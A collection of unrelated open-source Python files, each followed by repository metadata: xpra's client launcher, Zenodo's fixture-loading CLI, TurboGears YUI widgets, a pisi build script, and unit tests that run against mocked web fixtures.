    logging.root.addHandler(logging.StreamHandler(sys.stderr))
    # Dispatch on the first positional argument (the mode).
    mode = args.pop(0)
    if mode in ("start", "upgrade") and XPRA_LOCAL_SERVERS_SUPPORTED:
        nox()
        from xpra.scripts.server import run_server
        run_server(parser, options, mode, script_file, args)
    elif mode == "attach":
        try:
            run_client(parser, options, args)
        except KeyboardInterrupt:
            sys.stdout.write("Exiting on keyboard interrupt\n")
    elif mode == "stop":
        nox()
        run_stop(parser, options, args)
    elif mode == "list" and XPRA_LOCAL_SERVERS_SUPPORTED:
        run_list(parser, options, args)
    elif mode == "_proxy" and XPRA_LOCAL_SERVERS_SUPPORTED:
        nox()
        run_proxy(parser, options, args)
    else:
        parser.error("invalid mode '%s'" % mode)
def parse_display_name(parser, opts, display_name):
    """Parse a display string into a connection descriptor dict.

    Supported forms:
        ssh:HOST[:DISPLAY]  - proxy through ssh to a remote xpra
        :DISPLAY            - local unix-domain socket
        tcp:[HOST]:PORT     - plain TCP (empty host means 127.0.0.1)

    Anything else is reported through parser.error().
    """
    if display_name.startswith("ssh:"):
        spec = display_name[len("ssh:"):]
        desc = {"type": "ssh", "local": False}
        if ":" in spec:
            host, display = spec.split(":", 1)
            desc["host"] = host
            desc["display"] = ":" + display
            desc["display_as_args"] = [desc["display"]]
        else:
            # No display given: let the remote side pick its default.
            desc["host"] = spec
            desc["display"] = None
            desc["display_as_args"] = []
        desc["ssh"] = opts.ssh.split()
        desc["full_ssh"] = desc["ssh"] + ["-T", desc["host"]]
        desc["remote_xpra"] = opts.remote_xpra.split()
        desc["full_remote_xpra"] = desc["full_ssh"] + desc["remote_xpra"]
        return desc
    if display_name.startswith(":"):
        return {
            "type": "unix-domain",
            "local": True,
            "display": display_name,
        }
    if display_name.startswith("tcp:"):
        host, port_str = display_name[len("tcp:"):].split(":", 1)
        return {
            "type": "tcp",
            "local": False,
            "host": host or "127.0.0.1",
            "port": int(port_str),
        }
    parser.error("unknown format for display name")
def pick_display(parser, opts, extra_args):
    """Resolve the target display descriptor from the command line.

    With exactly one argument, parse it as a display name.  With none,
    fall back to the single live local server, erroring out when that
    choice is impossible (no local support, no live server) or
    ambiguous (several live servers).
    """
    if len(extra_args) > 1:
        parser.error("too many arguments")
    if len(extra_args) == 1:
        return parse_display_name(parser, opts, extra_args[0])
    # No display specified: try to autodetect a unique live local server.
    if not XPRA_LOCAL_SERVERS_SUPPORTED:
        parser.error("need to specify a display")
    sockdir = DotXpra()
    live_servers = [display
                    for (state, display) in sockdir.sockets()
                    if state is DotXpra.LIVE]
    if not live_servers:
        parser.error("cannot find a live server to connect to")
    if len(live_servers) > 1:
        parser.error("there are multiple servers running, please specify")
    return parse_display_name(parser, opts, live_servers[0])
def _socket_connect(sock, target):
    """Connect sock to target, exiting the process on failure.

    Returns a SocketConnection wrapping the connected socket.
    """
    try:
        sock.connect(target)
    except socket.error as e:
        sys.exit("Connection failed: %s" % (e,))
    return SocketConnection(sock)
def connect_or_fail(display_desc):
    """Open a connection to the server described by display_desc.

    Dispatches on the descriptor "type" produced by parse_display_name():
    "ssh" pipes through a spawned ssh child running xpra's _proxy mode,
    "unix-domain" and "tcp" connect a socket directly.
    """
    conn_type = display_desc["type"]
    if conn_type == "ssh":
        cmd = (display_desc["full_remote_xpra"]
               + ["_proxy"] + display_desc["display_as_args"])
        try:
            child = Popen(cmd, stdin=PIPE, stdout=PIPE)
        except OSError as e:
            sys.exit("Error running ssh program '%s': %s" % (cmd[0], e))
        return TwoFileConnection(child.stdin, child.stdout)
    if XPRA_LOCAL_SERVERS_SUPPORTED and conn_type == "unix-domain":
        sockdir = DotXpra()
        sock = socket.socket(socket.AF_UNIX)
        return _socket_connect(sock,
                               sockdir.socket_path(display_desc["display"]))
    if conn_type == "tcp":
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        return _socket_connect(sock,
                               (display_desc["host"], display_desc["port"]))
    assert False, "unsupported display type in connect"
def handshake_complete_msg(*args):
    """Print a notice once the client/server handshake has finished.

    Connected to the client's "handshake-complete" signal; the emitter's
    arguments are ignored.
    """
    sys.stdout.write("Attached (press Control-C to detach)\n")
def got_gibberish_msg(obj, data):
    """Heuristically detect ssh password/login prompts in unparseable data.

    Connected to the "received-gibberish" signal: when the transport
    yields bytes that are not xpra protocol, look for tell-tale ssh
    prompt fragments and print a hint for the user.
    """
    hints = []
    if "assword" in data:
        hints.append("Your ssh program appears to be asking for a password.\n"
                     + GOT_PASSWORD_PROMPT_SUGGESTION)
    if "login" in data:
        hints.append("Your ssh program appears to be asking for a username.\n"
                     "Perhaps try using something like 'ssh:USER@host:display'?\n")
    for hint in hints:
        sys.stdout.write(hint)
        sys.stdout.flush()
def run_client(parser, opts, extra_args):
    """Connect to an xpra server and run the client main loop.

    Validates options *before* opening the connection: the original code
    connected first, so an out-of-range compression level aborted after a
    socket had been connected (or an ssh child spawned), leaking it.
    """
    from xpra.client import XpraClient
    if opts.compression_level < 0 or opts.compression_level > 9:
        parser.error("Compression level must be between 0 and 9 inclusive.")
    conn = connect_or_fail(pick_display(parser, opts, extra_args))
    app = XpraClient(conn, opts.compression_level)
    app.connect("handshake-complete", handshake_complete_msg)
    app.connect("received-gibberish", got_gibberish_msg)
    app.run()
def run_proxy(parser, opts, extra_args):
    """Bridge this process's stdin/stdout to an xpra server (_proxy mode)."""
    from xpra.proxy import XpraProxy
    # This process only shuffles bytes; gtk must never have been loaded.
    assert "gtk" not in sys.modules
    server_conn = connect_or_fail(pick_display(parser, opts, extra_args))
    app = XpraProxy(TwoFileConnection(sys.stdout, sys.stdin), server_conn)
    app.run()
def run_stop(parser, opts, extra_args):
    """Ask a server to shut down and, for local servers, wait for it to die."""
    assert "gtk" not in sys.modules
    # Minimal handshake followed by a shutdown request, pre-encoded so it
    # can be pushed over the wire without a full protocol object.
    magic_string = bencode(["hello", []]) + bencode(["shutdown-server"])
    display_desc = pick_display(parser, opts, extra_args)
    conn = connect_or_fail(display_desc)
    while magic_string:
        # conn.write may accept only part of the buffer; loop until drained.
        magic_string = magic_string[conn.write(magic_string):]
    # Drain whatever the server sends back until it closes the connection.
    while conn.read(4096):
        pass
    if display_desc["local"]:
        # Poll the socket state for up to ~3 seconds to report the outcome.
        sockdir = DotXpra()
        for i in xrange(6):
            final_state = sockdir.server_state(display_desc["display"])
            if final_state is DotXpra.LIVE:
                time.sleep(0.5)
            else:
                break
        if final_state is DotXpra.DEAD:
            print "xpra at %s has exited." % display_desc["display"]
            sys.exit(0)
        elif final_state is DotXpra.UNKNOWN:
            print ("How odd... I'm not sure what's going on with xpra at %s"
                   % display_desc["display"])
            sys.exit(1)
        elif final_state is DotXpra.LIVE:
            print "Failed to shutdown xpra at %s" % display_desc["display"]
            sys.exit(1)
        else:
            assert False
    else:
        # Remote server: we cannot observe its socket, just report success.
        print "Sent shutdown command"
def run_list(parser, opts, extra_args):
    """List known xpra sessions, unlinking the sockets of dead ones."""
    assert "gtk" not in sys.modules
    if extra_args:
        parser.error("too many arguments for mode")
    sockdir = DotXpra()
    results = sockdir.sockets()
    if not results:
        sys.stdout.write("No xpra sessions found\n")
        return
    sys.stdout.write("Found the following xpra sessions:\n")
    for state, display in results:
        sys.stdout.write("\t%s session at %s" % (state, display))
        if state is DotXpra.DEAD:
            # Clean up the stale socket left behind by a dead server.
            try:
                os.unlink(sockdir.socket_path(display))
            except OSError:
                pass
            else:
                sys.stdout.write(" (cleaned up)")
        sys.stdout.write("\n")
| njsmith/partiwm | xpra/scripts/main.py | Python | gpl-2.0 | 12,235 |
# -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2015, 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""CLI for Zenodo fixtures."""
from __future__ import absolute_import, print_function
import json
from os.path import dirname, join
import click
from flask.cli import with_appcontext
from invenio_communities.utils import initialize_communities_bucket
from sqlalchemy.orm.exc import NoResultFound
from .communities import loadcommunities
from .files import loaddemofiles, loadlocation
from .grants import loadfp6funders, loadfp6grants
from .licenses import loadlicenses, matchlicenses
from .oai import loadoaisets
from .pages import loadpages
from .records import loaddemorecords
# Root of the fixtures CLI: all loader subcommands below attach to it
# via @fixtures.command(...).
@click.group()
def fixtures():
    """Command for loading fixture data."""
@fixtures.command()
@with_appcontext
def init():
    """Load basic data: pages, file location, OAI sets, communities bucket."""
    loadpages()
    loadlocation()
    loadoaisets()
    initialize_communities_bucket()
@fixtures.command('loadpages')
@click.option('--force', '-f', is_flag=True, default=False)
@with_appcontext
def loadpages_cli(force):
    """Load pages."""
    # --force recreates the pages even when they already exist.
    loadpages(force=force)
    click.secho('Created pages', fg='green')
@fixtures.command('loadlocation')
@with_appcontext
def loadlocation_cli():
    """Load data store location."""
    # loadlocation() returns the created location; echo its URI as confirmation.
    loc = loadlocation()
    click.secho('Created location {0}'.format(loc.uri), fg='green')
@fixtures.command('loadoaisets')
@with_appcontext
def loadoaisets_cli():
    """Load OAI-PMH sets."""
    # loadoaisets() returns the created sets (len() is applied below), so
    # name the local accordingly rather than "sets_count".
    oai_sets = loadoaisets()
    click.secho('Created {0} OAI-PMH sets'.format(len(oai_sets)), fg='green')
@fixtures.command('loadfp6grants')
@with_appcontext
def loadfp6grants_cli():
    """Load one-off grants."""
    # Thin CLI wrapper; the heavy lifting lives in .grants.loadfp6grants.
    loadfp6grants()
@fixtures.command('loadfp6funders')
@with_appcontext
def loadfp6funders_cli():
    """Load one-off funders."""
    # Thin CLI wrapper; the heavy lifting lives in .grants.loadfp6funders.
    loadfp6funders()
@fixtures.command('loaddemorecords')
@with_appcontext
def loaddemorecords_cli():
    """Load demo records."""
    click.echo('Loading demo data...')
    with open(join(dirname(__file__), 'data/records.json'), 'r') as fp:
        data = json.load(fp)
    click.echo('Sending tasks to queue...')
    with click.progressbar(data) as records:
        loaddemorecords(records)
    # Records are loaded asynchronously via Celery tasks; remind the
    # operator of the required follow-up steps.
    click.echo("1. Start Celery:")
    click.echo("    celery worker -A zenodo.celery -l INFO")
    click.echo("2. After tasks have been processed start reindexing:")
    click.echo("    zenodo migration recordsrun")
    click.echo("    zenodo migration reindex recid")
    click.echo("    zenodo index run -d -c 4")
@fixtures.command('loaddemofiles')
@click.argument('source', type=click.Path(exists=True, dir_okay=False,
                                          resolve_path=True))
@with_appcontext
def loaddemofiles_cli(source):
    """Load demo files."""
    # SOURCE is validated by click: it must be an existing regular file.
    loaddemofiles(source)
@fixtures.command('loadlicenses')
@with_appcontext
def loadlicenses_cli():
    """Load Zenodo licenses."""
    # Thin CLI wrapper; the heavy lifting lives in .licenses.loadlicenses.
    loadlicenses()
@fixtures.command('matchlicenses')
@click.argument('legacy_source', type=click.Path(exists=True, dir_okay=False,
                                                 resolve_path=True))
@click.argument('od_source', type=click.Path(exists=True, dir_okay=False,
                                             resolve_path=True))
@click.argument('destination', type=click.Path(exists=False, dir_okay=False))
# NOTE(review): unlike the sibling commands, no @with_appcontext here --
# presumably this is a pure file-to-file operation; confirm it needs no app.
def matchlicenses_cli(legacy_source, od_source, destination):
    """Match legacy Zenodo licenses with OpenDefinition.org licenses."""
    matchlicenses(legacy_source, od_source, destination)
@fixtures.command('loadcommunities')
@click.argument('owner_email')
@with_appcontext
def loadcommunities_cli(owner_email):
    """Load Zenodo communities."""
    # The owner is looked up by email; NoResultFound propagates from the
    # user query when no such account exists.
    try:
        loadcommunities(owner_email)
    except NoResultFound:
        click.echo("Error: Provided owner email does not exist.")
| lnielsen/zenodo | zenodo/modules/fixtures/cli.py | Python | gpl-2.0 | 4,703 |
# force floating point division. Can still use integer with //
from __future__ import division
# This file is used for importing the common utilities classes.
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append("../../../../../../")
from Util import Test
from Util.Test import _f_assert,HummerData,load_simulated_data
from FitUtil.EnergyLandscapes.InverseWeierstrass.Python.Code import \
InverseWeierstrass,WeierstrassUtil,WeightedHistogram
def assert_all_digitization_correct(objs):
    """Check digitization correctness for every object in objs.

    NOTE(review): _assert_digitization_correct is neither defined in this
    module nor imported (only _f_assert comes from Util.Test), so this
    looks like it would raise NameError at runtime -- verify which helper
    was intended.
    """
    for o in objs:
        _assert_digitization_correct(o)
def run():
    """Load simulated forward/reverse data and validate its digitization."""
    fwd,rev = load_simulated_data(n=2)
    assert_all_digitization_correct(fwd)
    assert_all_digitization_correct(rev)
if __name__ == "__main__":
    # Allow running this test module directly as a script.
    run()
| prheenan/BioModel | EnergyLandscapes/InverseWeierstrass/Python/TestExamples/Testing/MainTestingWeightedHistograms.py | Python | gpl-2.0 | 747 |
import os.path
import itertools
import pkg_resources
from turbogears.widgets import Widget, TextField
from turbogears.widgets import CSSSource, JSSource, register_static_directory
from turbogears import config
from turbojson import jsonify
from util import CSSLink, JSLink
# Public names exported by "from ... import *".
__all__ = ['YUIBaseCSS', 'YUIResetCSS', 'YUIFontsCSS', 'YUIGrids', 'YUIResetFontsGrids',
           'YUIAnimation', 'YUIMenuBar', 'YUIAutoComplete', 'YUITreeView',
           'yuibasecss', 'yuiresetcss', 'yuifontscss', 'yuigridscss', 'yui_reset_fonts_grids',
           'YUIMenuLeftNav',
           ]
# Register the bundled YUI assets as the "TGYUI" static directory.
pkg_path = pkg_resources.resource_filename(__name__, os.path.join("static", "yui"))
register_static_directory("TGYUI", pkg_path)
# Optional skinning, driven by the application's config file.
skin = config.get('app.yui.skin', None)
skin_method = config.get('app.yui.skin_method', 'minimized')
# Monotonic counter backing unique_id() below.
idcounter = itertools.count()
def unique_id(prefix='tgyui'):
    """Return a fresh id ('<prefix>_<n>') for widget-generated markup.

    Each call increments a module-level counter so that css/javascript
    snippets rendered per widget instance get distinct ids.

    Caveats for widgets fetched over XMLHttpRequest and inserted into a
    live document (e.g. with innerHTML or MochiKit.DOM.swapDOM()):

    - the counter restarts when the server restarts, so a widget fetched
      after a restart could be handed a previously used id; give such
      widgets an explicit id instead.
    - CSSLink and JSLink directives will not be processed for injected
      fragments: the hosting page must already include them (e.g. by
      returning another widget instance from the controller, even if the
      page does not display it at first).
    - CSSSource and JSSource are inserted in the HTML fragment as usual,
      but the browser will not run the javascript; initialize the widget
      from the code that retrieves and inserts the fragment instead.

    There are ways to parse the HTML fragment, extract the <script> tags
    and execute them, but that is outside the scope of this module.
    """
    return '%s_%d' % (prefix, next(idcounter))
def skinned(pth, resource_name):
    """Return the CSSLink list for a skinnable YUI resource.

    Honours the app.yui.skin / app.yui.skin_method config options; when
    no skin is configured only the plain stylesheet is linked.
    """
    if not skin:
        return [
            CSSLink("TGYUI", '%s/assets/%s' % (pth, resource_name)),
        ]
    base, ext = resource_name.rsplit('.', 1)
    skin_methods = {
        'minimized': [
            CSSLink("TGYUI", '%s/assets/skins/%s/%s' % (pth, skin, resource_name)),
        ],
        'core': [
            CSSLink("TGYUI", '%s/assets/%s-core.%s' % (pth, base, ext)),
            CSSLink("TGYUI", '%s/assets/skins/%s/%s-skin.%s' % (pth, skin, base, ext)),
        ],
        'uber': [
            CSSLink("TGYUI", '%s/assets/%s-core.%s' % (pth, base, ext)),
            CSSLink("TGYUI", 'assets/skins/%s/skin.css' % skin),
        ],
    }
    # EAFP: an unknown skin_method surfaces as a configuration error.
    try:
        return skin_methods[skin_method]
    except KeyError:
        raise ValueError("app.yui.skin_method must be one of '%s'"
                         % "', '".join(skin_methods.keys()))
class YUIBaseCSS(Widget):
    """Pulls in the minimised YUI 'base' stylesheet."""
    css = [CSSLink("TGYUI", "base/base-min.css")]
yuibasecss = YUIBaseCSS()
class YUIResetCSS(Widget):
    """Pulls in the minimised YUI 'reset' stylesheet."""
    css = [CSSLink("TGYUI", "reset/reset-min.css")]
yuiresetcss = YUIResetCSS()
class YUIFontsCSS(Widget):
    """Pulls in the minimised YUI 'fonts' stylesheet."""
    css = [CSSLink("TGYUI", "fonts/fonts-min.css")]
yuifontscss = YUIFontsCSS()
class YUIGrids(Widget):
    """Pulls in the minimised YUI 'grids' stylesheet."""
    css = [CSSLink("TGYUI", "grids/grids-min.css")]
yuigridscss = YUIGrids()
class YUIResetFontsGrids(Widget):
    """Use this in place of using all the three YUIResetCSS, YUIFontsCSS,
    YUIGrids. You might want to explicitly include all three if you use other
    widgets that depend on one of them, to avoid duplications."""
    # Single combined stylesheet shipped by YUI.
    css = [CSSLink("TGYUI", "reset-fonts-grids/reset-fonts-grids.css")]
yui_reset_fonts_grids = YUIResetFontsGrids()
class YUIAnimation(Widget):
    """Pulls in the YUI animation library plus the third-party effects shim."""
    javascript = [JSLink("TGYUI", "yahoo-dom-event/yahoo-dom-event.js"),
                  JSLink("TGYUI", "animation/animation-min.js"),
                  JSLink("TGYUI", "thirdparty/effects-min.js"),
                  ]
class YUIMenuBar(Widget):
    """Horizontal YUI menu built from a nested (label, url, children) list."""
    template = 'TGYUI.templates.menubar'
    params = ['id', 'entries', 'as_bar']
    css = ([CSSLink("TGYUI", "reset-fonts-grids/reset-fonts-grids.css"),
            CSSLink("TGYUI", "menu/assets/menu.css"),
            ] + skinned('menu', 'menu.css'))
    javascript = [JSLink("TGYUI", "yahoo-dom-event/yahoo-dom-event.js"),
                  JSLink("TGYUI", "container/container_core-min.js"),
                  JSLink("TGYUI", "menu/menu-min.js"),
                  ]
    # Class-level default id; note it is generated once at import time.
    id = unique_id(prefix='mbar')
    as_bar = True # set to False for e.g., leftNav
    # Default demo structure: (label, href, children) triples, children
    # being the same shape recursively.
    entries = [('Companies', '/companies', [
                   ('add new', '/companies/add_new', []),
                   ('browse', '/companies/browse', [
                       ('by name', '/companies/browse/by_name'),
                       ('by date', '/companies/browse/by_date'),
                   ]),
                   ('list', '/companies/list', []),
               ]),
               ('Contacts', '/contacts', []),
               ('Queries', '/queries', []),
               ('Mailings', '/mailings', []),
               ('Search', '/search', []),
               ]
    def __init__(self, entries=None, *args, **kw):
        # Allow overriding the menu structure per instance.
        super(YUIMenuBar, self).__init__(*args, **kw)
        if entries:
            self.entries = entries
class YUIMenuLeftNav(YUIMenuBar):
    """Vertical (left navigation) variant of YUIMenuBar."""
    as_bar = False
class YUIAutoComplete(TextField):
    "A standard, single-line text field with YUI AutoComplete enhancements."
    template = 'TGYUI.templates.autocomplete'
    params = ["attrs", "id", "search_controller", "result_schema", "search_param"]
    params_doc = {'attrs' : 'Dictionary containing extra (X)HTML attributes for'
                            ' the input tag',
                  'id' : 'ID for the entire AutoComplete construct.'}
    attrs = {}
    id = 'noid'
    # Name of the query parameter sent to search_controller.
    search_param = 'input'
    javascript = [JSLink("TGYUI", "yahoo-dom-event/yahoo-dom-event.js"),
                  JSLink("TGYUI", "json/json-min.js"),
                  JSLink("TGYUI", "autocomplete/autocomplete-min.js"),
                  ]
class YUITreeView(Widget):
    """Renders a YUI TreeView from a nested `entries` dict.

    Each node is {'expanded': bool, 'data': {...}, 'children': [...]};
    the structure is JSON-encoded and rebuilt client-side by
    yui_tree_init().
    """
    css = (skinned('treeview', 'treeview.css') +
           (skin and [CSSSource(".ygtvitem td {padding:0}.ygtvitem table {margin-bottom: 0}")] or []))
    javascript = [
        JSLink('TGYUI','yahoo/yahoo-min.js'),
        JSLink('TGYUI','event/event-min.js'),
        JSLink('TGYUI','treeview/treeview-min.js'),
        JSSource("""
function yui_tree_init(id, entries) {
    function yui_add_branch(node, branch) {
        var newnode = new YAHOO.widget.TextNode(branch.data, node, branch.expanded);
        if (branch.children) {
            for (var i=0; i<branch.children.length; i++) {
                yui_add_branch(newnode, branch.children[i]);
            }
        }
    }
    tree = new YAHOO.widget.TreeView(id);
    yui_add_branch(tree.getRoot(), entries);
    tree.draw();
}
""")
        ]
    template = """
<div xmlns:py="http://purl.org/kid/ns#"
    py:strip="True">
<div id="${id}" />
<script type="text/javascript">
yui_tree_init('${id}', ${entries});
</script>
</div>
"""
    # Default demo tree shown when no entries are supplied.
    entries = {'expanded': True,
               'data': {'href': '/stuff/foo', 'label': 'Foo'},
               'children': [
                   {'expanded': True,
                    'data': {'href': '/stuff/foo/bar', 'label': 'Bar'},
                    'children': [
                        {'expanded': True,
                         'data': {'href': '/stuff/foo/baz', 'label': 'Baz'},
                         'children': []
                        }]
                   },
                   {'expanded': True,
                    'data': {'href': '/stuff/foo/gazonk', 'label': 'Gazonk'},
                    'children': []
                   }]}
    id = None
    params = ['entries', 'id']
    def update_params(self, d):
        # Lazily assign a unique id and JSON-encode the tree for the template.
        super(YUITreeView, self).update_params(d)
        if d['id'] is None:
            d['id'] = unique_id()
        d['entries'] = jsonify.encode(d['entries'])
# Yahoo DP: http://developer.yahoo.com/ypatterns/pattern.php?pattern=moduletabs
class YUITabView(Widget):
    """YUI TabView widget; `dynamic` tabs are fetched on demand.

    `dynamic` is a list of dicts with label (string), dataSrc (uri) and
    cacheData (bool), JSON-encoded for the client-side initializer.
    """
    css = (skinned('tabview', 'tabview.css') +
           (skin and [CSSSource(".yui-navset .yui-nav a:hover {color: #000}")] or []) +
           [CSSLink('TGYUI','tabview/assets/border_tabs.css')]
           )
    javascript = [
        JSLink('TGYUI','yahoo-dom-event/yahoo-dom-event.js'),
        JSLink('TGYUI','element/element-beta-min.js'),
        JSLink('TGYUI','connection/connection-min.js'),
        JSLink('TGYUI','tabview/tabview-min.js'),
        ]
    id = 'tgyui_tabber'
    dynamic = [] # list of dictionaries with label (string), dataSrc (uri), cacheData (bool)
    params = ['id', 'dynamic']
    template = """
<script language="JavaScript" type="text/JavaScript">
(function() {
    var tabview = new YAHOO.widget.TabView("${id}");
    for each (var obj in ${dynamic}) {
        tabview.addTab(new YAHOO.widget.Tab(obj))
    }
})();
</script>
"""
    def update_params(self, d):
        # JSON-encode the dynamic tab descriptions for the template.
        super(YUITabView, self).update_params(d)
        d['dynamic'] = jsonify.encode(d['dynamic'])
| viswimmer1/PythonGenerator | data/python_files/30004740/widgets.py | Python | gpl-2.0 | 9,892 |
#!/usr/bin/python
from pisi.actionsapi import shelltools, get, cmaketools, pisitools
def setup():
    # Configure the CMake build tree with default options.
    cmaketools.configure()
def build():
    # Compile the configured sources.
    cmaketools.make()
def install():
    # Install the build products and ship the standard documentation files.
    cmaketools.install()
    pisitools.dodoc ("AUTHORS", "ChangeLog", "COPYING")
| richard-fisher/repository | desktop/util/tint2/actions.py | Python | gpl-2.0 | 263 |
# -*- coding: utf-8 -*-
import unittest
import os, sys
import PrimaPlay
import urllib2
# Run relative to this script's directory so the fixture files resolve.
os.chdir(os.path.dirname(sys.argv[0]))
# Dummy credentials used by the login test -- presumably no real account
# is needed since all HTTP traffic is mocked; verify before reuse.
user = 'text@example.com';
password = 'password';
class mockTime:
    """Stand-in for the time module exposing a frozen time()."""
    def time(self):
        # Fixed instant so timestamp-derived URLs are predictable in tests.
        return 1450875766
class mockUserAgent:
    """Offline stand-in for PrimaPlay.UserAgent.

    Maps known URLs to local fixture files; any unmapped URL raises
    HTTPError 500 so tests fail loudly instead of silently hitting the
    network.
    """
    def __init__(self, url_map = None):
        # Avoid a mutable default argument; extra mappings are merged in.
        self.ua = PrimaPlay.UserAgent()
        self.url_map = {
            'http://api.play-backend.iprima.cz/prehravac/init?_ts=1450875766&_infuse=1&productId=p135603': lambda url: 'test_player_init.js',
            'http://play.iprima.cz/': lambda url: 'test_homepage.html',
            'http://play.iprima.cz': lambda url: 'test_homepage.html',
            'http://play.iprima.cz/prostreno': lambda url: 'test_filters.html',
            'http://play.iprima.cz/vysledky-hledani-vse?query=prostreno': lambda url: 'test_search_page.html',
            'http://play.iprima.cz/prostreno-IX-9': lambda url: 'test_video_page.html',
            'http://play.iprima.cz/moje-play': lambda url: 'test_moje_play.html',
            'https://play.iprima.cz/tdi/login/nav/form?csrfToken=868668da5dd5d622ddee5738cf226523ccc6b708-1451918185394-55fbc39b6ea5a369d8723b76': lambda url: 'test_homepage_logged.html',
            'http://play.iprima.cz/prostreno?cat[]=EPISODE&src=p14877&sort[]=Rord&sort[]=latest': lambda url: 'test_prostreno_epizody.html',
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8': lambda url: self.raise_not_found(url),
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0001/4844/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8': lambda url: 'test_homepage.html',
            'http://api.play-backend.iprima.cz/prehravac/init?_ts=1450875766&_infuse=1&productId=p148175': lambda url: 'test_player_init-2.js',
            'http://play.iprima.cz/cestovani-cervi-dirou-s-morganem-freemanem-ii-9': lambda url: 'test_video_page-2.html',
            'http://play.iprima.cz/prostreno?season=p14894&action=remove': lambda url: 'test_remove_all_filters.html',
            'https://play.iprima.cz/tdi/dalsi?filter=allShows&sort[]=title&offset=54': lambda url: 'test_ajax_response.data',
            'https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=18': lambda url: 'test_ajax_response_p.data'
        }
        if url_map:
            self.url_map.update(url_map)
    def get(self, url):
        filename = self._get_filename_from_map(url)
        return self._get_cache(filename)
    def post(self, url, params):
        # POST bodies are ignored; responses depend only on the URL.
        filename = self._get_filename_from_map(url)
        return self._get_cache(filename)
    def _get_filename_from_map(self, url):
        if not self.url_map.has_key(url):
            print("ERROR! not found in url map: " + url)
            raise urllib2.HTTPError(url, 500, 'Internal server error', None, None)
        get_url = self.url_map[url]
        return get_url(url)
    def _get_cache(self, filename):
        # Context manager so the fixture file handle is always closed
        # (the original leaked it).
        with open(filename, 'r') as fl:
            return fl.read()
    def raise_not_found(self, url):
        raise urllib2.HTTPError(url, 404, 'Not found', None, None)
class PrimaPlayUnitTest(unittest.TestCase):
    """Exercises PrimaPlay.Parser/Account against canned HTML/JS fixtures.

    All network traffic goes through mockUserAgent and the clock is frozen
    by mockTime, so every assertion is deterministic and offline.
    """
    def setUp(self):
        pass
    def test_get_player_init_link(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        self.assertEqual(prima_play.get_player_init_url('p135603'),
            'http://api.play-backend.iprima.cz/prehravac/init?_ts=1450875766&_infuse=1&productId=p135603')
    def test_get_video_link__sd(self):
        # The HD playlist URL 404s in the mock, so the parser must fall
        # back to the SD variant.
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        self.assertEqual(prima_play.get_video_link('p135603'),
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4.smil/playlist.m3u8')
    def test_get_video_link__hd(self):
        prima_play = PrimaPlay.Parser(mockUserAgent({
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8': lambda url: 'test_homepage.html',
        }), mockTime())
        self.assertEqual(prima_play.get_video_link('p135603'),
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8')
    def test_get_video_link__force_sd(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime(), False)
        self.assertEqual(prima_play.get_video_link('p135603'),
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4.smil/playlist.m3u8')
    def test_get_next_list(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        next_list = prima_play.get_next_list('https://play.iprima.cz/tdi/dalsi?filter=allShows&sort[]=title&offset=54')
        self.assertEqual(next_list.next_link,
            'https://play.iprima.cz/tdi/dalsi?filter=allShows&sort[]=title&offset=72')
        self.assertEqual(len(next_list.list), 18)
        self.assertEqual(next_list.list[0].title, u'Největší esa mafie 1 Epizoda')
        self.assertEqual(next_list.list[0].link, 'http://play.iprima.cz/nejvetsi-esa-mafie-1')
    def test_get_next_list_series(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        next_list = prima_play.get_next_list('https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=18')
        self.assertEqual(next_list.next_link,
            'https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=36')
    def test_get_page__player_page(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz/prostreno-IX-9')
        self.assertEqual(page.player.title, u'Prostřeno!')
        self.assertEqual(page.player.video_link,
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0000/5314/cze-ao-sd1-sd2-sd3-sd4.smil/playlist.m3u8')
        self.assertEqual(page.player.image_url,
            'http://static.play-backend.iprima.cz/cdn/img/splash169/p135609-p183945/l_xhdpi')
        self.assertEqual(page.player.description,
            'Zábavná porce vašeho oblíbeného pořadu Prostřeno!')
        self.assertEqual(page.player.broadcast_date, '16.12.2015')
        self.assertEqual(page.player.duration, '42 min')
        self.assertEqual(page.player.year, '2015')
        self.assertEqual(len(page.video_lists), 2)
        self.assertEqual(page.video_lists[0].title, u'Další epizody')
